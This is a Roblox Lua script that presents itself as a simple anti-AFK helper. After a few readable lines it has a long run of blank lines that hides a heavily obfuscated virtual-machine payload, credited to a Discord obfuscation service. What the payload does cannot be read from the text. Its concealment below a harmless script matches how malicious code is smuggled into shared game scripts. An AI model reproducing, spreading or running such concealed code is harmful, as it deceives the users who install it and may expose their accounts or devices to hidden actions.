local player = game:GetService("Players").LocalPlayer
local virtualUser = game:GetService("VirtualUser")

player.Idled:Connect(function()
    virtualUser:Button2Down(Vector2.new(0, 0), workspace.CurrentCamera.CFrame)
    wait(1)
    virtualUser:Button2Up(Vector2.new(0, 0), workspace.CurrentCamera.CFrame)
end)


















































































































































































































































































































































































































































-- obfuscated @ discord.gg/25ms, obfuscation: ib2 fork
return(function(...)local l,Q,f=table,string,bit local V,c,n,s,i,u,h,r,a,o,e=Q.byte,Q.char,Q.sub,l.concat,l.insert,math.ldexp,getfenv and getfenv()or _ENV,setmetatable,select,unpack or l.unpack,tonumber;local t=(function(d)local Q,i,P,e,o,R,V=1,function(P)local Q=""for e=1,#P,1 do Q=Q..c(V(P,e)-(31))end return e(Q,36)end,"","",{},256,{}for Q=0,R-1 do V[Q]=c(Q)end;local function t()local P=i(n(d,Q,Q))Q=Q+1;local e=i(n(d,Q,Q+P-1))Q=Q+P;return e end;P=c(t())o[1]=P;while Q<#d do local Q=t()if V[Q]then e=V[Q]else e=P..n(P,1,1)end;V[R]=P..n(e,1,1)o[#o+1],P,R=e,e,R+1 end;return l.concat(o)end)("QQmQRVQVTQRVQRaQVUPjPhPtPlQRVQRcQVUQPfPlPVPvPlPPPTPpPfQVcQRbQVUQPmPVPVPRQVjQVlQVnQVcQRWQVUPyPuPhP`QVkPOQRVQQoQVUQPpPhPPPnQVhPRQWSQVoQVwQVmQVoQRVQQqQVUQPQPOQVkQPlPsPRPUQViQVkQWkQVpQVUQPqPrPfPhPuQWRQWTQVkQRVP`QVUPqQVtPRPOQQPQQjQQjPmPpPOPfPrPPPmQQkQXmPtQQjPhPRPpQQjPSPlPgPqPrPrPnPOQQjQPtQPyQPtQPsQQRQPwQPrQ`XQPxQPuQ`cQ`XQ`aQPvQPvQQjPpQPPQPdQPuPoPnPwPpPQQPOPpPtQPpQPyQPxPtPRPlQQQPUQPPQPuQPOPrQPvPVPoP`QPOQPQPjP`QPsQPrPsPTQPvQPuPPQPhQPlQPqPPQPlPRQPbQPlQPgPyQPuQPlPpPaQPbPtQPdQPtP`PwQPtPsPsPfPkQPkPfPtPpQRVQRTQVUQPWQPfQRVQRgQVUQPdPsPVPpQPjQVnPnQXQPhPmPlPmQRVQRSQVUPOP`PsQRVQWPQVTPPPlPQPUPlPOPVQRVQRiQXbQXdQPWQccQceQcgQciQcaQRVQXmQbsPlQbsQRVQRXQcUPVPPPpPsPjQcyQVUPkQXnPtPhQciQQPQVUQQPPSQWcPsQdSPjQQPQQaQPQPsPhQWvQ`QQdRPXQcQQQaQXlQdRPRPVQQaPlPaPlPfQWvPpPrPsQQaQcPPVQeSQebPmQQ`QdmQWqPPQdlQQdQWWQVWQVTQPoQVaQVcQR`QVUPRQXSPuPuQRVQerQVTQVkPPQXnQRVQddQVTQPRPqQXkQdvPfQdxQeOPtPUQchQQaPgPlQePQeRQeTQedQQaPkQfQPtQQaPVPqQfiPrPkPkQVnPpQXTQQaPuPrQcOQchQdRQdTQQ`QcjQVUQPRPrPUPfPqQPhQdoPgPuQcQQdVQVTQPpPrPgPpQgjQbjQWQQPbQexQVUQcpPPQXaQcTQenQQjQPdQc`QVUQXmPUQbsQgyQVdQVUQccPjQeVPsQeoQVbQVVQhUPpPVQhOQVUQXkPRQglQRVPlPtQfhPmQWWQeyQRVQbtPVQgrQbpQVTQVgPVPyQfQPmQgdPVQWsQdXQhTQVTQXVQVoQPlQcRQVqQVTQcPQdwPpQdyQheQRVPcQWoQehQdoQVbQQaQQUQQaQekQRcQWpQWrQPiQiwQiyPmQRcQPiQhoQWSP`QQaQhgQfiQixQjOQPiPlQWyQQaQPRP`QaSQjTQjOQPhQfkQWvQXnQjoPOQRcQPlPyQjuQRcQPbQgcQhXQjbQjfQjvPwPlQhdQeWQkOQPbQhkQkTQiyQjvQPlPvQjyQkUQhqQjQQatQiiQVUQjXPOQWgQWTQjdQgvQVTQXmQgRPPQhPQVUQlQQdOQVTQdpQfsQfRQemQRVQiuQVcQQuQWQQWVQeWQgPQPRQcqQQaPvQfaQinQciQVeQVTQPkPvQPnQPoQggQXmQcPQVQQVUQQoQijQRVQRUQVUQQaQlQQVTQbkQW`QgsQlPQmUQbkQmWQVTQmRQmRQVTQmTQmQQmjQmdQcSQhiQmUQmRQcTQmlQbkQmgQRVQmiQmcQgsQQoQQTQhiQhxQRVQQwQgsQVWQmlQcTQmtQmiQcTQmqQWXQVTQerQlSQlQQcTQerQbkQmiQVWQmRQWPQmXQerQReQlyQVTQdOQRdQmSQnsQdVQVeQlSQdOQQrQmjQVTQRaQPxQVUQoQQmRQoTQVUQguQmRQQoQQbQdVQmPQRXQRfQdVQgXQmfQVVQoUQVTQokQWXQoeQdOQckQnsQmRQdOQRPQoRQomQVUQoxQoXQonQRVQopQodQdVQRhQVUQRXQovQRVQPeQoyQo`QVTQpdQocQorQRVQogQoiQdOQQdQmjQpRQVUQpoQpqQVTQQgQmjQpVQdOQmPQQaQQVQdVQosQcyQpbQpvQmtQpfQRVQqVQpOQVTQQkQpwQpjQotQcyQpmQRVQqdQolQqXQqkQoqQpWQp`QpbQQSQpeQpSQqsQmgQlcQcsQocQQiQRVQnqQoiQmhQVTQnqQnqQWnQmXQnuQQpQnvQhaQVWQmXQrUQhaQbkQWnQhTQbpQnqQmXQnqQQnQp`QROQRVQnuQmeQmnQlXQnfQmnQkvQoSQmUQVUQlXQcsQRVQQUQrQQgsQmgQWnQsTQVTQWnQrxQqoQdOQlcQVTQmyQhTQQtQlQQsVQdOQmsQmuQqQQdOQcTQQsQqTQdVQPlQqtQVUQsxQocQnOQoPQp`QqiQPkQppQqbQRVQtVQtQQdVQQyQVUQRTQtdQWPQmtQRVQRQQsWQsTQslQnqQmRQmcQtdQnuQbkQVUQRRQhaQrtQlQQVeQtpQlQQmPQerQPuQVTQVqQQxQnRQRVQuTQpkQRVQQvQuXQuaQVqQtvQnSQufQtjQueQuUQRVQoxQnSQlSQVeQPUQtWQqXQusQptQctQqeQg`QrpQnsQrrQpXQnWQgsQryQmUQlXQloQVTQQcQg`QbkQpXQpaQg`PfQsyQkwQmjQvfQpXQvhQqWQpSQvnQVTQtkQVqQpXQVUQlcQqgQmgQddQpXQtiQVTQiRQhiQmiQoiQbkQgXQmXQrbQnXQVTQrbQrbQQXQlQQoiQrbQnjQVTQoiQoiQW`QrjQbpQmTQwmQwkQRVQrSQmuQwsQoiQrXQnOQWnQQeQmSQcTQrbQreQwvQncQVWQpoQmiQrpQVWQvbQvvQhqQVUQtnQrcQsuQuVQxVQoQQVqQudQmiQtdQugQxVQuWQVqQtkQmiQnSQVqQoxQg`QoiQnSQriQQRQboQRVQQWQwtQu`QwRQRVQoeQrPQVUQwuQmRQuaQoiQpvQQfQWmQyaQQhQyXQVUQpXQbpQmRQQqQpXQckQvRQmuQW`QvuQRVQVSQukQoiQqgQg`QpXQwVQsvQVeQVRQviQRVRPOaQpiQyUQvPQcyQrrQoiQnlQmmQryQv`QryQnQQlXRPOOQsUQyUQspQq`QVUQmtQhxQnqQVUQlPQPQPPQewQnfQPpQVhQ`QQcRQlXPyQPnPvQPRQidQRVQPmPlQcOQWVQg`QVTQkQQcvQbsQQlQjlQaSQylQlTPRQWgQVnQdbQheQQjPoPOQeWQryQPcPrPmQXaQv`QlqQlsQluRPQVPlQwuQRVQuWQsQRPOwQsRQlQRPOuRPPtQolQbkQuaQuPQmaQttQmjQuaQbkQneRPQnQhiRPQtQgsRPQtQmvQgsRPPOQsPQmaQmVRPRORPQyQWPRPRPRPRXQwQQoyQmURPOgRPOlQRVQcVQcXQtxPvQcWQXuQWqQQaQPVQRVRPOOQXkPnPPPsPuPfQgRPOPUQccQryQPjPwQPoQPqQhqPkPuPUPaQfeQhqQPgRPScRPSeQWWQnfQPdPPQVoRPSfRPRURPSmRPSoPORPRrQsOQcPPuPVPhQsOQjhRPSxRPTOQhxQlvQeQQhqQkQQcPRPSuRPTTPUQgpPaQsOQPbRPTcQbRQsOPsPlPXRPSSQsOQPoRPTlRPTnQwuPjQVhQeQQeSQjsRPRxQepRPPtQRVPpQcPQbsPpPkQWUQjrPVQfRQrjQRVQdnPnPsPrPSQeXQjqRPTwRPU`PPQQOQlyQoeQruQouQVUQerQvoRPUsQpwQnORPRXQVUQPyQteRPUoRPPPQqqQVUQuOQsRQpSRPVVQsjQsPRPVORPVQQsiRPUpQsOQohQVUQyrQmjQqXRPVjQqXQWnQtbQnwRPVcRPUyQqoQVTQcsRPVhQVTQlcQqlQpSRPVyQtXQsuRPVpQsWRPVrQvURPVtQrsRPVTQVTQudRPUuRPWbRPUwRPVUQlQRPVPRPVsQpVQumRPUrQrTRPWdQwvRPWTRPOTRPWiRPWWRPWkRPRtRPWaQRVQpsRPVWQprRPWfQyaRPWVRPQtRPWuQwuRPVwQRVQynRPWOQVURPX`QtXQykRPWTRPUbQRVRPWsRPXTRPVfQrbQnsQwuQQjQutQpSRPXoQuwQPsQuyQwcRPQlRPQjQVUQykQsQRPWuQrfQvfQVTQyTRPWoRP`URPWXQrfRPWWQtiRP`OQmURPVaQRVRPRhRPXiQlQQpvRPUqQsQQmaQlPRPRkRPPfQcoQcfQchRPPlQRVQXcQVuQcnQcdRP`rPVQnSRPVeRPXxQqhRPQkRPXaQsPQuwQVqRPOeRP`kQqPQmbQsvQumRPWoRPa`RPWXQnXQqQRPXwRPXhRPVdRPWXRPQtRPXWQoiRPaVQyXQuwQwaRPaoRPWhRPanRPWuQlPRPXWQslRPasRPbRQtXQoWRPWXQmaRP`hQVURPXtRPQiRPb`QpuRPaSQmUQrxRPQ`QlrQPoQjhRPTURPRiRPPRQewQsuQVTRP`vPRQXgQ`mPRQQlQXuPpQXqPrQXsRPQQRPQSRPPURPPWRPQVRPRiQPfQPhRPPeQlXRPQURPQWQmPQxVQmUQmiQlQQtiRPQmRPVSRPRXQuaQnbQcTRPcoQnPRPXwQmwRPRSQbkQseRPWWRPQiRPQiRPReRPVuQngQWoRPPSQhqRPPVQlVRPP`QWQRPPcRPPeQcsRPPhRPPjPPQWWQqgRPPnQebRPPpRPPrQVcRPUbQXuRPPwQXSQbtQeWRPQPRPQRQcXRPccRPQVP`RPOTRPOnQsQQqWRPXwQmtQrjRPQoQy`QmkRPRiRP`aRPeXRPQwQdVRPeVRPR`RPVQRPQtRPefRPRbQsQRPclRP`kQsQ");local Q,l,P,e=1,f and f.bxor or function(Q,P)local e,l=1,0 while Q>0 and P>0 do local R,n=Q%2,P%2 if R~=n then l=l+e end Q,P,e=(Q-R)/2,(P-n)/2,e*2 end if Q<P then Q=P end while Q>0 do local P=Q%2 if P>0 then l=l+e end Q,e=(Q-P)/2,e*2 end return l end,115,function(e,Q,P)if P then local Q=(e/2^(Q-1))%2^((P-1)-(Q-1)+1);return Q-Q%1;else local Q=2^(Q-1);return(e%(Q+Q)>=Q)and 1 or 0;end;end local P,d,R=function()local e,R,o,n=V(t,Q,Q+3);e,R,o,n=l(e,P),l(R,P),l(o,P),l(n,P)Q=Q+4;return(n*16777216)+(o*65536)+(R*256)+e;end,function()local P=l(V(t,Q,Q),P);Q=Q+1;return P;end,function()local e,n=V(t,Q,Q+2);e,n=l(e,P),l(n,P)Q=Q+2;return(n*256)+e;end;local function m()local Q=P();local P=P();local n=1;local l=(e(P,1,20)*(2^32))+Q;local Q=e(P,21,31);local P=((-1)^e(P,32));if(Q==0)then if(l==0)then return P*0;else Q=1;n=0;end;elseif(Q==2047)then return(l==0)and(P*(1/0))or(P*(0/0));end;return u(P,Q-1023)*(n+(l/(2^52)));end;local Q,n=P,function(e)local R;if(not e)then e=P();if(e==0)then return'';end;end;R=n(t,Q,Q+e-1);Q=Q+e;local P={}for Q=1,#R do P[Q]=c(l(V(n(R,Q,Q)),115))end return s(P);end;local Q,s=P,function(...)return{...},a('#',...)end local function f()local V,t,Q={},{},{};local c={V,t,nil,Q};local Q,l=P(),{}for e=1,Q do local P,Q=d();if(P==2)then Q=(d()~=0);elseif(P==3)then Q=m();elseif(P==0)then Q=n();end;l[e]=Q;end;for t=1,P()do local Q=d();if(e(Q,1,1)==0)then local n,o,Q=e(Q,2,3),e(Q,4,6),{R(),R(),nil,nil};if(n==0)then Q[3]=R();Q[4]=R();elseif(n==1)then Q[3]=P();elseif(n==2)then Q[3]=P()-(2^16)elseif(n==3)then Q[3]=P()-(2^16)Q[4]=R();end;if(e(o,1,1)==1)then Q[2]=l[Q[2]]end if(e(o,2,2)==1)then Q[3]=l[Q[3]]end if(e(o,3,3)==1)then Q[4]=l[Q[4]]end V[t]=Q;end end;for Q=1,P()do t[Q-1]=f();end;c[3]=d();return c;end;local function t(Q,V,R)local Q,P,e=Q[1],Q[2],Q[3];return function(...)local l,c,n,Q,P,a,h,s,f,d,e=Q,P,e,s,1,-1,{},{...},a('#',...)-1,{},{};for Q=0,f do if(Q>=n)then h[Q-n]=s[Q+1];else e[Q]=s[Q+1];end;end;local Q=f-n+1 local Q;local n;while true do Q=l[P];n=Q[1];if n<=31 then if n<=15 then if n<=7 then if n<=3 then if n<=1 then if n>0 then if e[Q[2]]then P=P+1;else P=Q[3];end;else do return e[Q[2]]end end;elseif n>2 then e[Q[2]]=e[Q[3]][Q[4]];P=P+1;Q=l[P];e[Q[2]]=e[Q[3]][Q[4]];P=P+1;Q=l[P];e[Q[2]]=e[Q[3]][Q[4]];P=P+1;Q=l[P];e[Q[2]]=e[Q[3]];P=P+1;Q=l[P];e[Q[2]]=e[Q[3]];P=P+1;Q=l[P];e[Q[2]]=e[Q[3]][Q[4]];P=P+1;Q=l[P];e[Q[2]]=e[Q[3]][Q[4]];P=P+1;Q=l[P];e[Q[2]]=e[Q[3]][Q[4]];P=P+1;Q=l[P];e[Q[2]]=e[Q[3]][Q[4]];P=P+1;Q=l[P];e[Q[2]]=e[Q[3]][Q[4]];else do return e[Q[2]]();end;end;elseif n<=5 then if n==4 then e[Q[2]]=e[Q[3]];else local P=Q[2];local l=e[P];for Q=P+1,Q[3]do i(l,e[Q])end;end;elseif n>6 then e[Q[2]]=V[Q[3]];else do return e[Q[2]]();end;end;elseif n<=11 then if n<=9 then if n>8 then do return end;else local P=Q[2];do return e[P](o(e,P+1,Q[3]))end;end;elseif n==10 then local n;e[Q[2]]=V[Q[3]];P=P+1;Q=l[P];e[Q[2]]={};P=P+1;Q=l[P];e[Q[2]]=V[Q[3]];P=P+1;Q=l[P];e[Q[2]][Q[3]]=e[Q[4]];P=P+1;Q=l[P];e[Q[2]][Q[3]]=Q[4];P=P+1;Q=l[P];e[Q[2]]={};P=P+1;Q=l[P];e[Q[2]][Q[3]]=Q[4];P=P+1;Q=l[P];e[Q[2]][Q[3]]=e[Q[4]];P=P+1;Q=l[P];e[Q[2]]=V[Q[3]];P=P+1;Q=l[P];e[Q[2]][Q[3]]=e[Q[4]];P=P+1;Q=l[P];n=Q[2]e[n](e[n+1])P=P+1;Q=l[P];do return end;else local V;local n;e[Q[2]]=R[Q[3]];P=P+1;Q=l[P];n=Q[2];V=e[Q[3]];e[n+1]=V;e[n]=V[Q[4]];P=P+1;Q=l[P];e[Q[2]]=Q[3];P=P+1;Q=l[P];n=Q[2]e[n]=e[n](o(e,n+1,Q[3]))P=P+1;Q=l[P];e[Q[2]]=R[Q[3]];P=P+1;Q=l[P];n=Q[2];V=e[Q[3]];e[n+1]=V;e[n]=V[Q[4]];P=P+1;Q=l[P];e[Q[2]]=Q[3];P=P+1;Q=l[P];n=Q[2]e[n]=e[n](o(e,n+1,Q[3]))P=P+1;Q=l[P];e[Q[2]]=R[Q[3]];P=P+1;Q=l[P];n=Q[2];V=e[Q[3]];e[n+1]=V;e[n]=V[Q[4]];end;elseif n<=13 then if n>12 then e[Q[2]][Q[3]]=e[Q[4]];else local P=Q[2]e[P]=e[P](o(e,P+1,Q[3]))end;elseif n==14 then e[Q[2]]=Q[3];else if not e[Q[2]]then P=P+1;else P=Q[3];end;end;elseif n<=23 then if n<=19 then if n<=17 then if n==16 then local R=Q[2];local l={};for Q=1,#d do local Q=d[Q];for P=0,#Q do local Q=Q[P];local n=Q[1];local P=Q[2];if n==e and P>=R then l[P]=n[P];Q[1]=l;end;end;end;else local Q=Q[2]e[Q]=e[Q](e[Q+1])end;elseif n>18 then local P=Q[2]e[P]=e[P](o(e,P+1,Q[3]))else local P=Q[2];local l=e[Q[3]];e[P+1]=l;e[P]=l[Q[4]];end;elseif n<=21 then if n==20 then e[Q[2]]={};else local Q=Q[2]e[Q]=e[Q]()end;elseif n>22 then P=Q[3];else local l=Q[2];local P=e[Q[3]];e[l+1]=P;e[l]=P[Q[4]];end;elseif n<=27 then if n<=25 then if n==24 then e[Q[2]]=t(c[Q[3]],nil,R);else local R;local n;e[Q[2]]=V[Q[3]];P=P+1;Q=l[P];e[Q[2]]={};P=P+1;Q=l[P];e[Q[2]]=V[Q[3]];P=P+1;Q=l[P];e[Q[2]][Q[3]]=e[Q[4]];P=P+1;Q=l[P];e[Q[2]][Q[3]]=Q[4];P=P+1;Q=l[P];e[Q[2]]={};P=P+1;Q=l[P];e[Q[2]][Q[3]]=Q[4];P=P+1;Q=l[P];e[Q[2]][Q[3]]=e[Q[4]];P=P+1;Q=l[P];e[Q[2]]=V[Q[3]];P=P+1;Q=l[P];n=Q[2];R=e[Q[3]];e[n+1]=R;e[n]=R[Q[4]];P=P+1;Q=l[P];e[Q[2]]=V[Q[3]];P=P+1;Q=l[P];n=Q[2]e[n]=e[n](o(e,n+1,Q[3]))P=P+1;Q=l[P];e[Q[2]][Q[3]]=e[Q[4]];P=P+1;Q=l[P];n=Q[2]e[n](e[n+1])P=P+1;Q=l[P];do return end;end;elseif n>26 then e[Q[2]]=R[Q[3]];else local V;local n;n=Q[2]e[n]=e[n](o(e,n+1,Q[3]))P=P+1;Q=l[P];e[Q[2]]=R[Q[3]];P=P+1;Q=l[P];n=Q[2];V=e[Q[3]];e[n+1]=V;e[n]=V[Q[4]];P=P+1;Q=l[P];e[Q[2]]=Q[3];P=P+1;Q=l[P];n=Q[2]e[n]=e[n](o(e,n+1,Q[3]))P=P+1;Q=l[P];e[Q[2]]=e[Q[3]][Q[4]];P=P+1;Q=l[P];e[Q[2]]=Q[3];P=P+1;Q=l[P];e[Q[2]]=R[Q[3]];P=P+1;Q=l[P];e[Q[2]]=e[Q[3]][Q[4]];P=P+1;Q=l[P];if e[Q[2]]then P=P+1;else P=Q[3];end;end;elseif n<=29 then if n==28 then local n;e[Q[2]]=e[Q[3]];P=P+1;Q=l[P];n=Q[2]e[n]=e[n]()P=P+1;Q=l[P];e[Q[2]]={};P=P+1;Q=l[P];e[Q[2]][Q[3]]=Q[4];P=P+1;Q=l[P];e[Q[2]][Q[3]]=Q[4];P=P+1;Q=l[P];e[Q[2]][Q[3]]=Q[4];P=P+1;Q=l[P];e[Q[2]][Q[3]]=Q[4];P=P+1;Q=l[P];e[Q[2]][Q[3]]=Q[4];P=P+1;Q=l[P];if not e[Q[2]]then P=P+1;else P=Q[3];end;else e[Q[2]]=e[Q[3]];end;elseif n==30 then e[Q[2]]=V[Q[3]];else local c=c[Q[3]];local o;local n={};o=r({},{__index=function(P,Q)local Q=n[Q];return Q[1][Q[2]];end,__newindex=function(e,Q,P)local Q=n[Q]Q[1][Q[2]]=P;end;});for R=1,Q[4]do P=P+1;local Q=l[P];if Q[1]==4 then n[R-1]={e,Q[3]};else n[R-1]={V,Q[3]};end;d[#d+1]=n;end;e[Q[2]]=t(c,o,R);end;elseif n<=47 then if n<=39 then if n<=35 then if n<=33 then if n==32 then local R;local n;e[Q[2]]=V[Q[3]];P=P+1;Q=l[P];n=Q[2];R=e[Q[3]];e[n+1]=R;e[n]=R[Q[4]];P=P+1;Q=l[P];e[Q[2]]=V[Q[3]];P=P+1;Q=l[P];e[Q[2]]={};P=P+1;Q=l[P];e[Q[2]][Q[3]]=Q[4];P=P+1;Q=l[P];e[Q[2]][Q[3]]=Q[4];P=P+1;Q=l[P];n=Q[2]e[n]=e[n](e[n+1])P=P+1;Q=l[P];e[Q[2]]=e[Q[3]][Q[4]];P=P+1;Q=l[P];n=Q[2];do return e[n](o(e,n+1,Q[3]))end;P=P+1;Q=l[P];n=Q[2];do return o(e,n,a)end;P=P+1;Q=l[P];do return end;else local P=Q[2];local l=e[P];for Q=P+1,Q[3]do i(l,e[Q])end;end;elseif n==34 then local P=Q[2]local n,l={e[P](e[P+1])},0;for Q=P,Q[4]do l=l+1;e[Q]=n[l];end else local Q=Q[2]e[Q](e[Q+1])end;elseif n<=37 then if n>36 then local R=Q[2];local n={};for Q=1,#d do local Q=d[Q];for P=0,#Q do local P=Q[P];local l=P[1];local Q=P[2];if l==e and Q>=R then n[Q]=l[Q];P[1]=n;end;end;end;else for Q=Q[2],Q[3]do e[Q]=nil;end;end;elseif n==38 then local P=Q[2]local n,l={e[P](e[P+1])},0;for Q=P,Q[4]do l=l+1;e[Q]=n[l];end else e[Q[2]]=R[Q[3]];end;elseif n<=43 then if n<=41 then if n==40 then local n;e[Q[2]]=R[Q[3]];P=P+1;Q=l[P];e[Q[2]]=e[Q[3]][Q[4]];P=P+1;Q=l[P];e[Q[2]]=Q[3];P=P+1;Q=l[P];e[Q[2]]=e[Q[3]][Q[4]];P=P+1;Q=l[P];n=Q[2]e[n]=e[n](o(e,n+1,Q[3]))P=P+1;Q=l[P];e[Q[2]][Q[3]]=e[Q[4]];P=P+1;Q=l[P];e[Q[2]]=R[Q[3]];else e[Q[2]][Q[3]]=e[Q[4]];end;elseif n>42 then local Q=Q[2];do return o(e,Q,a)end;else do return end;end;elseif n<=45 then if n>44 then local Q=Q[2];do return o(e,Q,a)end;else e[Q[2]]={};end;elseif n>46 then local Q=Q[2]e[Q]=e[Q](e[Q+1])else e[Q[2]]=t(c[Q[3]],nil,R);end;elseif n<=55 then if n<=51 then if n<=49 then if n>48 then if e[Q[2]]then P=P+1;else P=Q[3];end;else e[Q[2]][Q[3]]=Q[4];end;elseif n==50 then for Q=Q[2],Q[3]do e[Q]=nil;end;else e[Q[2]]=e[Q[3]][Q[4]];end;elseif n<=53 then if n==52 then do return e[Q[2]]end else P=Q[3];end;elseif n==54 then local c=c[Q[3]];local o;local n={};o=r({},{__index=function(P,Q)local Q=n[Q];return Q[1][Q[2]];end,__newindex=function(e,Q,P)local Q=n[Q]Q[1][Q[2]]=P;end;});for R=1,Q[4]do P=P+1;local Q=l[P];if Q[1]==4 then n[R-1]={e,Q[3]};else n[R-1]={V,Q[3]};end;d[#d+1]=n;end;e[Q[2]]=t(c,o,R);else if not e[Q[2]]then P=P+1;else P=Q[3];end;end;elseif n<=59 then if n<=57 then if n>56 then e[Q[2]][Q[3]]=Q[4];else local R;local n;e[Q[2]][Q[3]]=e[Q[4]];P=P+1;Q=l[P];e[Q[2]][Q[3]]=Q[4];P=P+1;Q=l[P];e[Q[2]]={};P=P+1;Q=l[P];e[Q[2]][Q[3]]=Q[4];P=P+1;Q=l[P];e[Q[2]][Q[3]]=e[Q[4]];P=P+1;Q=l[P];n=Q[2];R=e[n];for Q=n+1,Q[3]do i(R,e[Q])end;end;elseif n>58 then local Q=Q[2]e[Q]=e[Q]()else local V;local n;e[Q[2]]={};P=P+1;Q=l[P];e[Q[2]]={};P=P+1;Q=l[P];n=Q[2];V=e[Q[3]];e[n+1]=V;e[n]=V[Q[4]];P=P+1;Q=l[P];e[Q[2]]=R[Q[3]];P=P+1;Q=l[P];e[Q[2]]=e[Q[3]][Q[4]];P=P+1;Q=l[P];n=Q[2]e[n]=e[n](o(e,n+1,Q[3]))P=P+1;Q=l[P];e[Q[2]]=e[Q[3]][Q[4]];P=P+1;Q=l[P];e[Q[2]][Q[3]]=e[Q[4]];P=P+1;Q=l[P];e[Q[2]]=R[Q[3]];P=P+1;Q=l[P];e[Q[2]]=e[Q[3]][Q[4]];end;elseif n<=61 then if n>60 then local Q=Q[2]e[Q](e[Q+1])else e[Q[2]]=e[Q[3]][Q[4]];end;elseif n>62 then local P=Q[2];do return e[P](o(e,P+1,Q[3]))end;else e[Q[2]]=Q[3];end;P=P+1;end;end;end;return t(f(),{},h)(...);end)(...)
